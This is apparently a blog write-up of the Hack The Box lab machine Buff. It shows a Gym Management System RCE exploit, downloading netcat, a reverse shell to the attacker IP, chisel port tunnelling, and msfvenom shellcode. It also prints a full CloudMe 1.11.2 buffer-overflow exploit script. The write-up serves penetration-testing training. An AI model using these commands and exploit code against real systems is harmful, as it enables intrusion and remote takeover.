Home Hack The Box Write-Up Buff - 10.10.10.198
Post
Cancel

Hack The Box Write-Up Buff - 10.10.10.198

Notoriety wasn’t as good as fame, but was heaps better than obscurity.

Neil Gaiman

About Buff

In this post, I’m writing a write-up for the machine Buff from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills

Buff is a ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10 and submitting the root flag you points will be raised by 20.

Foothold

After the initial port scan with Nmap, we can discover one open port 8080/tcp. Behind this port, there is a web server running with the Gym Management Software version 1.0. This version suffers an unauthenticated Remote Code Execution (RCE) vulnerability.

User

After downloading and running the exploit, we were able to have a web shell on the machine and read the user flag.

Root

In the enumeration, we can find the file CloudMe_1112.exe in the Downloads folder. Through searchsploit, we can find that this version suffers a Buffer Overflow (BOF) vulnerability. The application Cloudme is running locally on port 8888/tcp. To get this exploit working, we need to reverse tunneling this port to our attacker machine and then we can run the exploit to gain a reverse shell as the administrator to root this machine.

Machine Info

Machine Name: Buff
Difficulty: Easy
Points: 20
Release Date: 19 Jul 2020
IP: 10.10.10.198
Creator: egotisticalSW

Recon

Port scan with Nmap

As always we start the box with a Nmap port scan.

1
nmap -sC -sV -oA ./nmap/10.10.10.198 10.10.10.198

The results of the port scan.

1
2
3
4
5
6
7
8
9
10
11
12
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-28 17:36 CEST
Nmap scan report for 10.10.10.198
Host is up (0.021s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.60 seconds

As we can see from the results there is only one open port 8080/tcp. We can see that there is running an Apache webserver behind this port with a website with the title mrb3n's Bro Hut.

Enumeration

Enumeration Web Server

We can check the web service running on the HTTP port 8080, by entering the URL http://10.10.10.198:8080 in Firefox. I landed on the homepage of mrb3n's Bro hut.

http://10.10.10.198:8080

On the Contact page we see that the website is made with the Gym Management System 1.0.

http://10.10.10.198:8080/contact.php

Through searchsploit, we can search for a known vulnerability in this version of this management system. It seems that this version of the Gym Management software has an Unauthenticated Remote Code Execution vulnerability.

1
2
3
4
5
6
7
8
~$ searchsploit Gym
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                         |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution                                                                                      | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection                                                                                                                 | php/webapps/42801.txt
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Exploitation

Unauthenticated Remote Code Execution

I copied the exploit 48506.py to my working directory and analyzed the code. Gym Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.

http://10.10.10.198:8080/upload.php

Let’s run the exploit to get a web shell. If you have problems with running this exploit because this exploit wants to run with Python3. I have solved this problem with the steps below. You can also upgrade the exploit to get support for Python 3. But that takes us too long, so we’re going to install pip for Python 2.7, so that we can install the missing Python 2.7 modules.

First, install pip for Python2. To install pip, we need to download the get-pip.py Python script.

1
2
3
4
5
6
7
8
9
~$ wget https://bootstrap.pypa.io/get-pip.py
--2020-08-01 04:39:14--  https://bootstrap.pypa.io/get-pip.py
Resolving bootstrap.pypa.io (bootstrap.pypa.io)… 151.101.0.175, 151.101.64.175, 151.101.128.175, …
Connecting to bootstrap.pypa.io (bootstrap.pypa.io)|151.101.0.175|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 1929903 (1.8M) [text/x-python]
Saving to: ‘get-pip.py’
get-pip.py                                      100%[=====================================================================================================>]   1.84M  1.57MB/s    in 1.2s    
2020-08-01 04:39:16 (1.57 MB/s) - ‘get-pip.py’ saved [1929903/1929903]

Then we can use Python version 2.7 to call this script. This script detects that it is being run by Python 2.7, and it will then download and install the latest pip version for Python 2.7.

1
2
3
4
5
6
7
8
9
10
11
12
~$ python2 get-pip.py
 DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.
 Collecting pip<21.0
   Downloading pip-20.3.4-py2.py3-none-any.whl (1.5 MB)
      |████████████████████████████████| 1.5 MB 1.6 MB/s 
 Collecting setuptools<45
   Downloading setuptools-44.1.1-py2.py3-none-any.whl (583 kB)
      |████████████████████████████████| 583 kB 1.7 MB/s 
 Collecting wheel
   Downloading wheel-0.36.2-py2.py3-none-any.whl (35 kB)
 Installing collected packages: pip, setuptools, wheel
 Successfully installed pip-20.3.4 setuptools-44.1.1 wheel-0.36.2

After pip for Python 2.7 is downloaded and installed, we can download and install the missing modules.

1
2
~$ python -m pip install requests
~$ python -m pip install colorama

The missing modules are installed. We can now run the exploit.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
~$ python 49506.py http://10.10.10.198:8080/
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG

buff\shaun

C:\xampp\htdocs\gym\upload> type C:\users\shaun\desktop\user.txt
�PNG

c23d5206ed1079f3f7466337bab963d2

After running the exploit, we have a web shell, and we can read the user flag. For me, this is the fastest foothold and user flag ever on Hack The Box. The next phase is to do a privilege escalation.

Privilege Escalation

Reverse shell

I have to exit this web shell so that I have more commands at my disposal. I downloaded the nc.exe to the box and created a reverse shell with PowerShell.

1
2
3
4
C:\xampp\htdocs\gym\upload> powershell -c "curl 10.10.16.144/nc.exe -o nc.exe"
�PNG

C:\xampp\htdocs\gym\upload> nc.exe 10.10.16.144 4444 -e powershell.exe

The reverse shell is established.

1
2
3
4
5
6
7
8
9
10
~$ netcat -lvvp 4444
Listening on any address 4444 (krb524)
whoami
Connection from 10.10.10.198:49794
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

whoami
buff\shaun
PS C:\xampp\htdocs\gym\upload>

The machine Buff is a 64-bits Windows 10 Enterprise operating system.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
C:\xampp\htdocs\gym\upload> systeminfo                                                  
�PNG


Host Name:                 BUFF
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.17134 N/A Build 17134
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          shaun
Registered Organization:   
Product ID:                00329-10280-00000-AA218
Original Install Date:     16/06/2020, 15:05:58
System Boot Time:          29/07/2020, 14:24:20
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
...

After a time of searching, I found the file CloudMe_1112.exe in the ‘Downloads’ folder of the user Shaun.

1
2
3
4
5
6
7
8
9
10
11
12
13
PS C:\Users\shaun\Downloads> ls
ls


    Directory: C:\Users\shaun\Downloads


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       16/06/2020     16:26       17830824 CloudMe_1112.exe                                                      


PS C:\Users\shaun\Downloads>

We can see that the software CloudMe is installed because the processes are running on this machine.

1
2
3
4
5
6
7
8
9
10
11
PS C:\> get-process                                                                                                                                                                      
get-process                                                                                                                                                                              
                                                                                                                                                                                         
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName                                                                                                                    
-------  ------    -----      -----     ------     --  -- -----------                                                                                                                    
    430      24    17700       9032              6908   1 ApplicationFrameHost                                                                                                           
    161      10     1936       2148              7256   1 browser_broker                                                                                                                 
    239      19    25648      29328               316   0 CloudMe                                                                                                                        
    288      36    32832         32              8612   0 CloudMe                                                                                                                        
     45       4     1940       2320       0.00   2876   0 cmd                                                                                                                            
     41       5     2752       3372              4432   0 cmd     

If we check the connections on this machine, we see that this machine is listening on port 8888/tcp.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
C:\xampp\htdocs\gym\upload> netstat -anop TCP
�PNG


Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       956
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       5840
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       8380
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       4512
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       528
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1092
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1592
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2244
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       688
  TCP    10.10.10.198:139       0.0.0.0:0              LISTENING       4
  TCP    10.10.10.198:8080      10.10.16.101:49614     FIN_WAIT_2      4512
  TCP    10.10.10.198:8080      10.10.16.101:49616     ESTABLISHED     4512
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       8092
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       1704
  TCP    127.0.0.1:54468        127.0.0.1:3306         TIME_WAIT       0
  TCP    127.0.0.1:54470        127.0.0.1:3306         TIME_WAIT       0

We can check searchploit for CloudMe version 1.1.12 and it seems that this version has a Buffer Overload (BOF) vulnerability.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
~$ searchsploit cloudme
--------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                           |  Path
--------------------------------------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)                                                                   | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)                                                          | windows/local/48499.txt
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)                                                         | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass)                                                  | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)                                           | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow                                                              | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt                                                          | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)                                                 | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow                                                                  | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)                                               | windows_x86-64/remote/44784.py
--------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

I copied the exploit 48389.py to my working directory. After analyzing the payload, I can to the conclusion that we have to build a reverse tunnel. I downloaded Chisel 1.6.0, from GitHub: https://github.com/jpillora/chisel/releases/tag/v1.6.0. For my attacking machine, I’ve downloaded chisel_1.6.0_linux_amd64.gz and for the windows machine, I downloaded chisel_1.6.0_windows_amd64.gz. Download the chisel_1.1.0.exe on the machine and start local the chisel server.

We can start the chisel server on the attacker machine with a listener on port 5000.

1
2
3
4
~$ ./chisel_1.6.0_linux_amd64 server -p 5000 --reverse
2021/02/05 05:16:28 server: Reverse tunnelling enabled
2021/02/05 05:16:28 server: Fingerprint 2c:bc:a2:96:16:a4:07:3e:67:d7:72:2b:aa:68:be:cd
2021/02/05 05:16:28 server: Listening on 0.0.0.0:5000…

After downloding chisel to the buff machine, we can forward port 8888 to our machine.

1
2
3
4
5
6
7
S C:\xampp\htdocs\gym\upload> curl 10.10.16.144/chisel.exe -o chisel.exe
 curl 10.10.16.144/chisel.exe -o chisel.exe
 PS C:\xampp\htdocs\gym\upload> ./chisel.exe client 10.10.16.144:5000 R:8888:127.0.0.1:8888
 ./chisel.exe client 10.10.16.144:5000 R:8888:127.0.0.1:8888
 2021/02/05 10:33:31 client: Connecting to ws://10.10.16.144:5000
 2021/02/05 10:33:32 client: Fingerprint 2c:bc:a2:96:16:a4:07:3e:67:d7:72:2b:aa:68:be:cd
 2021/02/05 10:33:33 client: Connected (Latency 191.5351ms)

Exploitation with Buffer Overflow

We can now create a reverse shell payload with msfvenom.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
~$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.144 LPORT=5555 EXITFUNC=thread -b "\x00\x0d\x0a" -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1869 bytes
payload =  b""
payload += b"\xba\xdf\x45\x75\x98\xdb\xc2\xd9\x74\x24\xf4\x58"
payload += b"\x31\xc9\xb1\x52\x31\x50\x12\x83\xc0\x04\x03\x8f"
payload += b"\x4b\x97\x6d\xd3\xbc\xd5\x8e\x2b\x3d\xba\x07\xce"
payload += b"\x0c\xfa\x7c\x9b\x3f\xca\xf7\xc9\xb3\xa1\x5a\xf9"
payload += b"\x40\xc7\x72\x0e\xe0\x62\xa5\x21\xf1\xdf\x95\x20"
payload += b"\x71\x22\xca\x82\x48\xed\x1f\xc3\x8d\x10\xed\x91"
payload += b"\x46\x5e\x40\x05\xe2\x2a\x59\xae\xb8\xbb\xd9\x53"
payload += b"\x08\xbd\xc8\xc2\x02\xe4\xca\xe5\xc7\x9c\x42\xfd"
payload += b"\x04\x98\x1d\x76\xfe\x56\x9c\x5e\xce\x97\x33\x9f"
payload += b"\xfe\x65\x4d\xd8\x39\x96\x38\x10\x3a\x2b\x3b\xe7"
payload += b"\x40\xf7\xce\xf3\xe3\x7c\x68\xdf\x12\x50\xef\x94"
payload += b"\x19\x1d\x7b\xf2\x3d\xa0\xa8\x89\x3a\x29\x4f\x5d"
payload += b"\xcb\x69\x74\x79\x97\x2a\x15\xd8\x7d\x9c\x2a\x3a"
payload += b"\xde\x41\x8f\x31\xf3\x96\xa2\x18\x9c\x5b\x8f\xa2"
payload += b"\x5c\xf4\x98\xd1\x6e\x5b\x33\x7d\xc3\x14\x9d\x7a"
payload += b"\x24\x0f\x59\x14\xdb\xb0\x9a\x3d\x18\xe4\xca\x55"
payload += b"\x89\x85\x80\xa5\x36\x50\x06\xf5\x98\x0b\xe7\xa5"
payload += b"\x58\xfc\x8f\xaf\x56\x23\xaf\xd0\xbc\x4c\x5a\x2b"
payload += b"\x57\x79\x91\x23\x37\x15\xa7\x43\x22\x55\x2e\xa5"
payload += b"\x26\x89\x67\x7e\xdf\x30\x22\xf4\x7e\xbc\xf8\x71"
payload += b"\x40\x36\x0f\x86\x0f\xbf\x7a\x94\xf8\x4f\x31\xc6"
payload += b"\xaf\x50\xef\x6e\x33\xc2\x74\x6e\x3a\xff\x22\x39"
payload += b"\x6b\x31\x3b\xaf\x81\x68\x95\xcd\x5b\xec\xde\x55"
payload += b"\x80\xcd\xe1\x54\x45\x69\xc6\x46\x93\x72\x42\x32"
payload += b"\x4b\x25\x1c\xec\x2d\x9f\xee\x46\xe4\x4c\xb9\x0e"
payload += b"\x71\xbf\x7a\x48\x7e\xea\x0c\xb4\xcf\x43\x49\xcb"
payload += b"\xe0\x03\x5d\xb4\x1c\xb4\xa2\x6f\xa5\xd4\x40\xa5"
payload += b"\xd0\x7c\xdd\x2c\x59\xe1\xde\x9b\x9e\x1c\x5d\x29"
payload += b"\x5f\xdb\x7d\x58\x5a\xa7\x39\xb1\x16\xb8\xaf\xb5"
payload += b"\x85\xb9\xe5"

I can now place the payload in the exploit script. After the modification of the exploit, we got left with this script.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket
target = "127.0.0.1"

padding1   = b"\x90" * 1052
EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS       = b"\x90" * 30

# msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload =  b""
payload += b"\xba\xdf\x45\x75\x98\xdb\xc2\xd9\x74\x24\xf4\x58"
payload += b"\x31\xc9\xb1\x52\x31\x50\x12\x83\xc0\x04\x03\x8f"
payload += b"\x4b\x97\x6d\xd3\xbc\xd5\x8e\x2b\x3d\xba\x07\xce"
payload += b"\x0c\xfa\x7c\x9b\x3f\xca\xf7\xc9\xb3\xa1\x5a\xf9"
payload += b"\x40\xc7\x72\x0e\xe0\x62\xa5\x21\xf1\xdf\x95\x20"
payload += b"\x71\x22\xca\x82\x48\xed\x1f\xc3\x8d\x10\xed\x91"
payload += b"\x46\x5e\x40\x05\xe2\x2a\x59\xae\xb8\xbb\xd9\x53"
payload += b"\x08\xbd\xc8\xc2\x02\xe4\xca\xe5\xc7\x9c\x42\xfd"
payload += b"\x04\x98\x1d\x76\xfe\x56\x9c\x5e\xce\x97\x33\x9f"
payload += b"\xfe\x65\x4d\xd8\x39\x96\x38\x10\x3a\x2b\x3b\xe7"
payload += b"\x40\xf7\xce\xf3\xe3\x7c\x68\xdf\x12\x50\xef\x94"
payload += b"\x19\x1d\x7b\xf2\x3d\xa0\xa8\x89\x3a\x29\x4f\x5d"
payload += b"\xcb\x69\x74\x79\x97\x2a\x15\xd8\x7d\x9c\x2a\x3a"
payload += b"\xde\x41\x8f\x31\xf3\x96\xa2\x18\x9c\x5b\x8f\xa2"
payload += b"\x5c\xf4\x98\xd1\x6e\x5b\x33\x7d\xc3\x14\x9d\x7a"
payload += b"\x24\x0f\x59\x14\xdb\xb0\x9a\x3d\x18\xe4\xca\x55"
payload += b"\x89\x85\x80\xa5\x36\x50\x06\xf5\x98\x0b\xe7\xa5"
payload += b"\x58\xfc\x8f\xaf\x56\x23\xaf\xd0\xbc\x4c\x5a\x2b"
payload += b"\x57\x79\x91\x23\x37\x15\xa7\x43\x22\x55\x2e\xa5"
payload += b"\x26\x89\x67\x7e\xdf\x30\x22\xf4\x7e\xbc\xf8\x71"
payload += b"\x40\x36\x0f\x86\x0f\xbf\x7a\x94\xf8\x4f\x31\xc6"
payload += b"\xaf\x50\xef\x6e\x33\xc2\x74\x6e\x3a\xff\x22\x39"
payload += b"\x6b\x31\x3b\xaf\x81\x68\x95\xcd\x5b\xec\xde\x55"
payload += b"\x80\xcd\xe1\x54\x45\x69\xc6\x46\x93\x72\x42\x32"
payload += b"\x4b\x25\x1c\xec\x2d\x9f\xee\x46\xe4\x4c\xb9\x0e"
payload += b"\x71\xbf\x7a\x48\x7e\xea\x0c\xb4\xcf\x43\x49\xcb"
payload += b"\xe0\x03\x5d\xb4\x1c\xb4\xa2\x6f\xa5\xd4\x40\xa5"
payload += b"\xd0\x7c\xdd\x2c\x59\xe1\xde\x9b\x9e\x1c\x5d\x29"
payload += b"\x5f\xdb\x7d\x58\x5a\xa7\x39\xb1\x16\xb8\xaf\xb5"
payload += b"\x85\xb9\xe5"

overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))    
buf = padding1 + EIP + NOPS + payload + overrun 
try:
     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     s.connect((target,8888))
     s.send(buf)
except Exception as e:
     print(sys.exc_value)

The only thing we have to do, is make sure that your netcat is listening on port 5555 and then run the payload.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
~$ python 48389.py

Reverse shell is established and we can own Buff.

~$ nc -lvvp 5555
listening on [any] 5555 …
10.10.10.198: inverse host lookup failed: Unknown host
connect to [10.10.16.144] from (UNKNOWN) [10.10.10.198] 49681
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt 
9dac8c83a3f6da218fb334836a7bdf1b

C:\Windows\system32>

Thanks for reading this write-up. This write-up and the machine Buff, can be used for your preperation for the OCSP exam. I hope in the future to write a blog post about OCSP and how you can prepare for the OCSP. But first, I have to do the OCSP by myself 🙂

If you like this write-up, please consider spending a respect point, my HTB profile: https://app.hackthebox.eu/profile/224856.

Happy Hacking :-)

This post is licensed under CC BY 4.0 by the author.